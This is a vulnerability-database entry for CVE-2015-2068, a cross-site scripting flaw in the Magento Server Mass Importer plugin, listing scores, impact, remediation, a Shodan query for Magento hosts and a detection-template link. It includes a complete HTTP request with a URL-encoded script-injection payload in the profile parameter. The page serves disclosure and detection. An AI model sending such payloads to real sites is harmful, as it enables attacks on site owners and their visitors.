🔙 목록으로 돌아가기

CVE-2015-2068: Magento Server Mass Importer - Cross-Site Scripting

TitleMagento Server Mass Importer - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server.
RemediationApply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module.
CVSS Score4.3
EPSS Score0.05406
CVE IDCVE-2015-2068
CWE IDCWE-79
Shodan Queryhttp.component:"Magento"http.component:"magento"
Tags cve2015 cve plugin edb packetstorm magento magmi xss magmi_project magento_server vuln

🔍 Vulnerability Description

Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.

🌐 HTTP Request

GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-2068.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-2068.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A